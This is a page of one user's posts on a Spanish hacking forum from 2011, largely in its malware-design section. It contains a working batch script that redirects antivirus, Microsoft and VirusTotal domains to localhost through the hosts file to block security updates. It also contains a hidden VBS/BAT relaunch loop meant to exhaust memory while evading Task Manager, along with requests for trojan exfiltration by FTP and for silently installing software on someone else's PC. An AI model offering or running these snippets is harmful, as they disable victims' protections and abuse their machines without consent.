elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17
141  Seguridad Informática / Análisis y Diseño de Malware / Re: Bloquear actualizaciones de antivirus ¿aun funciona esto? en: 3 Febrero 2011, 21:38 pm
Aki va un código de doble filo.
Código:
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
Lo compilamos con el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe y para que no se vea la ventana y tendremos un virus en tiempo real con triple funcion XD.
142  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Elige el diseño (tema) en el foro en: 3 Febrero 2011, 20:58 pm
NO lo encuentro
143  Programación / Scripting / ¿Como genero un archivo con un nombre por defecto y lo envió por ftp? en: 3 Febrero 2011, 20:48 pm
¿Como genero un archivo con un nombre por defecto y lo envio por ftp? La cuestión es que estoy haciendo un troyano de prueba y necesito crea txt que contenga la ip y otros datos o comprimir sus documentos y subirlos por ftp (cualquiera viene bien) pero debo subirlo a ftp con un nombre único para poder enviarlo por ftp.
144  Seguridad Informática / Análisis y Diseño de Malware / Re: Programar virus que consuma la memoria en: 2 Febrero 2011, 21:15 pm
Perdón por revivir el post pero me llamo mucho la atención.
Aquí les traigo 2 archivos para ocupar memoria:

Primero: Creamos un vbs con block de notas que contenga lo siguiente y que se llame vas.vbs por ejemplo:

Citar
set objshell = createobject("wscript.shell")
objshell.run "vas.bat",vbhide

Segundo: Creamos un bat con block de notas que contenga lo siguiente y que se llame vas.bat por ejemplo:

Citar
start vas.vbs
start vas.vbs
start vas.vbs
pause

Tercero: Todo debe estar junto y si quieren remplacen el vas por el nombre que quieran pero todo, el nombre, el archivo todo.

Explicación: lo que hace esto es lo siguiente ejecutamos el vbs y el vbs ejecuta al bat de forma oculta y luego el bat ejecuta al vbs y así se va completando el ciclo que cada vez ejecuta a mas bat y los deja parados asi se va juntando memoria. Pueden eliminarle y agregarles mas start vas.vbs asi ocupa memoria mas rápido, pero no lo recomiendo sino nos descubrirían mas rápido, incluso se le puede dejar uno solo y sacarle el pause así el menos probable que no vean tantos cmd.exe wscript.exe en el administrador de tareas.
145  Comunicaciones / Mensajería / Re: Recopilación de páginas FAKE sobre Msn en las que NO entrar en: 30 Enero 2011, 20:39 pm
Cita de: KuraraGNU en 26 Agosto 2010, 22:53 pm
Yo creo que sí, yo me he metido muchas veces y no me ha pasado nada, de todas formas te recomiendo cambiar tu pass cada cierto tiempo, no cuesta nada, y si alegas tener mala cabeza, pues es un buen método para ejercitarla.

Imagina que e-buddy es una página con renombre, si empiezan a meterse en los correos de la gente (que no dudo que puedan, porque las claves las tienen seguro) dejarían de tener clientes, porque no se si te has dado cuenta tienen tantos anuncios como el msn, si ya hasta incluso te obligan a interactuar con algunos, de ahí sacan la pasta. Tienen hasta versión portable para psp y dispositivos móviles.

Si ves una página con muuuucha publicidad, fíate más que si ves otra sin nada de nada, así al menos sabes que aunque no pagues nada por conectarte al servidor, ellos obtienen beneficios igualmente.

eBuddy por lo menos yo se que es muy fiable.
146  Comunicaciones / Mensajería / Re: Recopilación de páginas FAKE sobre Msn en las que NO entrar en: 30 Enero 2011, 04:44 am
Hola, estoy viendo esto y me di cuenta de  que no hay ningún programa liviano sencillo y actualiza-ble de evitar estas web y estoy desarrollando un software que tiene la opción de: bloquear webs así, webs spam, y estoy viendo la forma de poner una contraseña en vb6 o un método bizarro para bloquear webs porno.
147  Seguridad Informática / Análisis y Diseño de Malware / Re: Bloquear actualizaciones de antivirus ¿aun funciona esto? en: 29 Enero 2011, 01:01 am
Esto ya no funciona mas o eso creo.
¿Que es lo que pasa?, los avs se actualizan creo, desde el reg con otro ip asi que creo que esto aunque lo camuflemos con el mejor cripter creo que levantaría sospechas pero porque empresaria a mandar alertas pero es posible ej: con el execript, al otro día mandan a mi virus, lo analizar, después como mi virus desactivo a las actualizaciones de x cantidad de antivirus esa x cantidad de ordenadores con antivirus des-actualizados seguirá infectándose Xd.
148  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Como le instalo la WAT (WGA) a una persona de forma oculta? en: 27 Enero 2011, 01:21 am
Cita de: Elemental Code en 26 Enero 2011, 23:45 pm
busca el programa USSF

Universal Silent Switch Finder.

le cargas el ejecutable instalador del WGA (crei que WGA habia sido reemplazado por WAT :S)

y te dice cual parametro le tenes que agregar para que sea silent.

cualquiercosa avisame que te explico mas
Gracias y aparte me sirve para otro proyecto.
Si en realidad si porque avían demandado a la WGA.
Me imagino que le pongo /SILENT ¿NO?
149  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Como le instalo la WGA a una persona de forma oculta? en: 26 Enero 2011, 22:15 pm
Cita de: Karcrack en 26 Enero 2011, 14:30 pm
Tal vez el parametro -h no funcione, pero seguramente lo hará el /? o alguno similar... podrias subir una captura de la informacion del fichero? (Segundo boton,propiedades)

y que tal attrib +s +r +h WAT.exe?
150  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Como le instalo la WGA a una persona de forma oculta? en: 25 Enero 2011, 21:17 pm
Cita de: Karcrack en 25 Enero 2011, 21:10 pm
Prueba a ver si el instalador permite la instalación oculta mediante un comando del tipo /s... para saberlo puedes hacer desde el cmd un "nombre_instalador.exe -h" por ejemplo ;)
Gracias, y a probar se a dicho.  ;-)
wohoho linda broma pesada

(No hagas doble post, Karcrack)
Cita de: Karcrack en 25 Enero 2011, 21:10 pm
Prueba a ver si el instalador permite la instalación oculta mediante un comando del tipo /s... para saberlo puedes hacer desde el cmd un "nombre_instalador.exe -h" por ejemplo ;)
Tu código no funciona porque no tiene el parámetro -h, pero la intención vale.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines